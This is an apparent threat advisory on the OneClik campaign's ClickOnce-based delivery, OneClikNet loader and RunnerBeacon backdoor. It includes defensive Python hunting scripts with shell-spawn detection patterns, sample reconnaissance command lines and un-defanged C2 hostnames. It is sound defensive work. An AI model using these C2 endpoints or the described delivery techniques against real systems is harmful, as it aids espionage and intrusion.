June 25, 2025
Severity
High
Analysis Summary
A newly identified advanced persistent threat (APT) campaign, tracked as OneClik, is targeting the energy, oil and gas sectors by abusing Microsoft ClickOnce, the legitimate .NET application deployment feature, used as designed rather than through a software vulnerability. The campaign begins with convincing phishing emails that lead users to Azure Blob Storage-hosted pages posing as "hardware analysis" portals. These pages serve a malicious ClickOnce application manifest, which starts an infection chain that installs the malware as if it were a legitimately deployed application. Because both the lure and the manifest are hosted on a trusted cloud service, reputation-based controls see only Microsoft-owned infrastructure, which is how the initial payload gets past traditional security solutions.
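The delivery chain above leaves a recognisable trail in endpoint process-creation telemetry. The following is an added hunting example written for this advisory; it is not code from the researchers or from the campaign. It assumes the standard ClickOnce footprint on Windows (a .application manifest is opened via rundll32.exe with dfshim.dll,ShOpenVerbApplication, the deployment service is dfsvc.exe, and installed ClickOnce apps run from %LOCALAPPDATA%\Apps\2.0\), and the event layout, paths, PIDs and the hwanalysis storage account name are constructed for illustration.

```python
"""Hunt for the OneClik delivery stage in Windows process-creation telemetry.

Added example, not code from the advisory or from the campaign. It assumes the
standard ClickOnce footprint on Windows: a .application manifest is opened via
rundll32.exe with dfshim.dll,ShOpenVerbApplication <url>, the ClickOnce
deployment service is dfsvc.exe, and installed ClickOnce apps run from
%LOCALAPPDATA%\\Apps\\2.0\\. The event layout and sample events are constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# ClickOnce launch handler (quotes around the dll path are optional in telemetry).
CLICKONCE_HANDLER = re.compile(r'dfshim\.dll"?,\s*ShOpenVerbApplication', re.I)
# Azure Blob Storage URL, the lure hosting named in the advisory.
AZURE_BLOB_URL = re.compile(r"https?://[a-z0-9]+\.blob\.core\.windows\.net/\S+", re.I)
# Per-user ClickOnce application cache.
CLICKONCE_APP_DIR = re.compile(r"\\AppData\\Local\\Apps\\2\.0\\", re.I)
# Interpreters a "hardware analysis" tool has no reason to spawn.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


@dataclass(frozen=True)
class Event:
    pid: int
    image: str          # full path of the new process
    cmdline: str
    parent_image: str   # full path of the parent process


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    severity: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(ev: Event) -> list[Finding]:
    """Apply the three ClickOnce-chain rules to one process-creation event."""
    findings: list[Finding] = []
    # Rule 1: a ClickOnce manifest being opened, scored higher when it comes from Azure Blob.
    if basename(ev.image) == "rundll32.exe" and CLICKONCE_HANDLER.search(ev.cmdline):
        if AZURE_BLOB_URL.search(ev.cmdline):
            findings.append(Finding(ev.pid, "clickonce-launch-from-azure-blob", "high"))
        else:
            findings.append(Finding(ev.pid, "clickonce-launch", "low"))
    # Rule 2: a process started out of the ClickOnce cache (a hunting lead; common in legitimate estates).
    if CLICKONCE_APP_DIR.search(ev.image):
        findings.append(Finding(ev.pid, "clickonce-app-started", "low"))
    # Rule 3: a ClickOnce-deployed app spawning a shell or script host.
    if CLICKONCE_APP_DIR.search(ev.parent_image) and basename(ev.image) in SHELLS:
        findings.append(Finding(ev.pid, "shell-spawned-by-clickonce-app", "high"))
    return findings


def hunt(events: list[Event]) -> list[Finding]:
    return [f for ev in events for f in evaluate(ev)]


# Constructed sample telemetry: hostnames, paths and PIDs are illustrative only.
DFSVC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
APP = r"C:\Users\j.doe\AppData\Local\Apps\2.0\K1PQ6Z9R.0AM\7YX4C2E1.N3B\hard..tion_0000000000000000_0001.0000_1a2b3c4d5e6f7a8b\HardwareAnalyzer.exe"
SAMPLE_EVENTS = [
    Event(4120, r"C:\Program Files\Microsoft\Edge\Application\msedge.exe",
          r'"msedge.exe" --single-argument https://hwanalysis.blob.core.windows.net/portal/index.html',
          r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"),
    Event(4388, r"C:\Windows\System32\rundll32.exe",
          r'"C:\Windows\System32\rundll32.exe" dfshim.dll,ShOpenVerbApplication https://hwanalysis.blob.core.windows.net/portal/HardwareAnalyzer.application',
          r"C:\Program Files\Microsoft\Edge\Application\msedge.exe"),
    Event(4512, APP, r'"HardwareAnalyzer.exe"', DFSVC),
    Event(4600, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c whoami /all", APP),
    Event(4711, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c ipconfig", r"C:\Program Files\Vendor\Agent\agent.exe"),
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.severity:5} pid={f.pid:<6} {f.rule}")
```

Rule 2 on its own fires for every legitimately deployed ClickOnce application, so it is kept at low severity and is meant to be joined with rule 1 (the manifest came from Azure Blob) or rule 3 (the deployed app spawned a shell) before an analyst is paged.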
According to the researchers who documented the campaign, OneClik's infection process has been observed in three variants, v1a, BPI-MDM and v1d, each adding stealth, evasion and control features over the previous one. At its core the malware uses a two-stage payload: a .NET loader called OneClikNet and a Go-based backdoor known as RunnerBeacon. The loader carries modular configuration logic that adapts to each target environment, while the backdoor keeps a persistent channel to its command-and-control (C2) servers, encrypting the traffic with RC4 and encoding the messages with MessagePack. This gives the operators long-term access with little on the wire to trigger conventional alerts. The C2 traffic is sent to legitimate AWS front-ends, specifically CloudFront distributions, API Gateway stages and Lambda function URLs, including the following C2 endpoints:
- hxxps://dyydej4wei7fq.cloudfront[.]net
- hxxps://b2zei88b61.execute-api.eu-west-2.amazonaws[.]com
- hxxps://d1ismqgtp337lz.cloudfront[.]net
- hxxps://dzxwmpi8xepml.cloudfront[.]net
- hxxps://7dqtdjxfycaqhjvc2qmx5js4aq0juygw.lambda-url.us-east-1.on[.]aws
Routing C2 through AWS services in this way is what sets OneClik apart: the connections are HTTPS sessions to AWS-owned hostnames, so IP, ASN and domain-reputation blocking see nothing unusual and the traffic blends into routine cloud usage. Detection therefore depends on matching the specific hostnames, on behavioural analysis of which endpoint processes open these connections, or on TLS inspection at the perimeter, not on the encrypted payload itself. Each variant also adds anti-analysis measures, culminating in memory-based sandbox detection and domain verification in the later versions, which points to continuous development by the actor.
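The hostname matching described above, as an added example written for this advisory rather than code from the researchers or from the malware: it checks proxy log lines against the exact C2 endpoints listed (with the defanging removed) and, as a lower-confidence hunting lead, against the generic CloudFront, API Gateway and Lambda function URL name patterns, minus an allowlist of front-ends the organisation legitimately uses. The log format, source IPs, allowlist entry and the non-IOC API Gateway hostname in the sample are constructed.

```python
"""Flag proxy-log requests to the OneClik C2 endpoints listed in this advisory
and, more broadly, to AWS serverless front-ends (CloudFront, API Gateway,
Lambda function URLs) that the campaign abuses for C2.

Added example, not part of the advisory or the malware: the log format and the
sample lines are constructed for illustration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Exact C2 hosts from the advisory, with the defanged [.] restored.
ONECLIK_C2_HOSTS = {
    "dyydej4wei7fq.cloudfront.net",
    "b2zei88b61.execute-api.eu-west-2.amazonaws.com",
    "d1ismqgtp337lz.cloudfront.net",
    "dzxwmpi8xepml.cloudfront.net",
    "7dqtdjxfycaqhjvc2qmx5js4aq0juygw.lambda-url.us-east-1.on.aws",
}

# Generic name patterns for the AWS services the campaign hides behind. These are
# legitimate services used by many applications, so a generic hit is a hunting
# lead, never a verdict on its own.
AWS_SERVERLESS_PATTERNS = {
    "cloudfront": re.compile(r"^[a-z0-9]+\.cloudfront\.net$"),
    "api-gateway": re.compile(r"^[a-z0-9]+\.execute-api\.[a-z0-9-]+\.amazonaws\.com$"),
    "lambda-url": re.compile(r"^[a-z0-9]+\.lambda-url\.[a-z0-9-]+\.on\.aws$"),
}

# Front-ends your own applications are known to use (constructed entry for the example).
ALLOWLIST = {"d111111abcdef8.cloudfront.net"}

# Constructed proxy log format: "<ts> <src_ip> <method> <url> <status> <bytes>"
LOG_LINE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3}) (\d+)$")


@dataclass(frozen=True)
class Hit:
    src_ip: str
    host: str
    verdict: str   # "known-c2" or "generic:<service>"


def host_of(url: str) -> str:
    """Lower-cased hostname from a URL, without scheme, port or path."""
    m = re.match(r"^https?://([^/:]+)", url)
    return m.group(1).lower() if m else ""


def classify(host: str) -> str | None:
    """Exact IOC match first; allowlisted hosts are dropped before the generic patterns run."""
    if host in ONECLIK_C2_HOSTS:
        return "known-c2"
    if host in ALLOWLIST:
        return None
    for name, pat in AWS_SERVERLESS_PATTERNS.items():
        if pat.match(host):
            return f"generic:{name}"
    return None


def scan(lines: list[str]) -> list[Hit]:
    hits: list[Hit] = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:           # malformed or unrelated lines are skipped, not fatal
            continue
        _ts, src, _method, url, _status, _size = m.groups()
        host = host_of(url)
        verdict = classify(host)
        if verdict:
            hits.append(Hit(src, host, verdict))
    return hits


def by_source(hits: list[Hit]) -> dict[str, list[Hit]]:
    """Group hits per internal source; sources with a known C2 hit, then the busiest, come first."""
    grouped: dict[str, list[Hit]] = {}
    for h in hits:
        grouped.setdefault(h.src_ip, []).append(h)
    return dict(sorted(grouped.items(),
                       key=lambda kv: (-any(h.verdict == "known-c2" for h in kv[1]), -len(kv[1]))))


# Constructed sample log: the update.example-vendor.com and zq4x9abcd API Gateway hosts are not IOCs.
SAMPLE_LOG = """\
2025-06-25T09:14:02Z 10.20.5.17 GET https://update.example-vendor.com/agent/check 200 412
2025-06-25T09:14:10Z 10.20.5.17 POST https://dyydej4wei7fq.cloudfront.net/api/v1/sync 200 1287
2025-06-25T09:15:33Z 10.20.5.42 GET https://d111111abcdef8.cloudfront.net/assets/app.js 200 55120
2025-06-25T09:16:01Z 10.20.5.17 POST https://zq4x9abcd.execute-api.us-west-2.amazonaws.com/prod/beacon 200 96
2025-06-25T09:16:45Z 10.20.5.88 GET https://7dqtdjxfycaqhjvc2qmx5js4aq0juygw.lambda-url.us-east-1.on.aws/ 200 64
malformed line that the parser skips
""".splitlines()

if __name__ == "__main__":
    for src, src_hits in by_source(scan(SAMPLE_LOG)).items():
        for h in src_hits:
            print(f"{h.verdict:22} {src:12} {h.host}")
```

Because the generic patterns cover ordinary AWS-hosted applications, the allowlist has to be built from your own traffic baseline before the generic verdicts are worth alerting on; the exact IOC matches can be alerted on immediately.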
The RunnerBeacon backdoor uses a protocol with 16 message types covering basic beaconing and file transfer as well as SOCKS5 proxying, port scanning, shell execution and privilege escalation. It supports interactive command execution in separate processes with redirected input and output, shellcode injection, token manipulation and task control. With this structured design and its encrypted channel, RunnerBeacon offers remote-access functionality comparable to commercial post-exploitation frameworks, consistent with a campaign built for long-term, covert espionage against strategic infrastructure.
Impact
- Sensitive Data Theft
- Gain Access
- Security Bypass
Remediation
- Disable ClickOnce execution for non-approved applications through Group Policy or endpoint management tools. On Windows this is controlled per security zone by the values under HKLM\SOFTWARE\MICROSOFT\.NETFramework\Security\TrustManager\PromptingLevel: setting the Internet and UntrustedSites zones to Disabled blocks untrusted ClickOnce applications from those zones instead of prompting the user, and AuthenticodeRequired allows only applications signed by a trusted publisher.
- Log and baseline outbound traffic to Azure Blob Storage, AWS CloudFront, API Gateway and Lambda function URL endpoints, alert on internal hosts that begin talking to such endpoints without a known business reason, and match the hostnames listed above exactly.
- Where policy permits TLS inspection at the perimeter, record the SNI or Host header of outbound connections so the listed C2 hostnames can be matched and blocked. The RC4-encrypted MessagePack payload travels inside TLS and has no reliable byte signature, so deep packet inspection will not identify RunnerBeacon traffic by content; detection rests on the destination hostnames and on which endpoint processes open the connections.
- Filter emails for suspicious links and attachments, especially those referring to “hardware analysis” tools or domains hosted on Azure Blob Storage.
- Use application control policies (for example WDAC or AppLocker) to allow only trusted software to run, blocking unknown or unsigned .NET and Go binaries. ClickOnce applications install under the user-writable %LOCALAPPDATA%\Apps\2.0 directory, so path-based rules that trust only the Program Files and Windows directories cover them.
- Ensure operating systems and endpoint software are regularly updated to reduce exposure to privilege escalation or remote code execution vulnerabilities.
- Educate employees about phishing tactics, especially those using cloud-hosted links or impersonating diagnostic tools.
- Isolate OT (Operational Technology) and ICS (Industrial Control Systems) from internet-facing systems to reduce lateral movement potential.
- Use modern endpoint and extended detection and response tools (EDR/XDR) with behaviour analysis to detect post-exploitation activity such as shellcode injection, token manipulation and shells spawned from ClickOnce-deployed applications.
- Continuously scan for known indicators of compromise (IOCs), process injection, and unusual shell activity related to OneClikNet and RunnerBeacon.
- Apply the principle of least privilege to all user and service accounts to restrict attackers’ ability to escalate privileges or perform lateral movement.
- Regularly review cloud service configurations and access logs to detect abuse of resources for malicious purposes.